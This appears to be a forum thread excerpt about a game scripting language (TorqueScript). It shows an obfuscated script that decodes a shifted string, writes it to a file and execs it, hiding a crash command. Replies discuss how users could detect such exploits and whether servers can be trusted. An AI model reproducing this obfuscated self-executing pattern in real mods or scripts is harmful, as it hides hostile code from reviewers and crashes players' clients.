$alpha = "0123456789 abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+-=~{}[]:;<>?\",./'";
function a(%a)
{
for(%b=getsubstr(%a,0,1);%b!$="";%b=getsubstr(%a,%c++,1))
%d=%d @ getsubstr($alpha, (strpos($alpha, %b) - 1) % 66, 1);
return%d;
}
function b(%a)
{
%b="base/a.cs";
%f = new fileobject();
%f.openforwrite(%b);
%f.writeline(a(%a));
%f.close();
%f.delete();
exec(%b);
}
b("dsbti)_<");
how can a regular user be able to detect an exploit like that
@lug
Exactly my point. Unless you have some sort of trusted approval process then you can't trust the server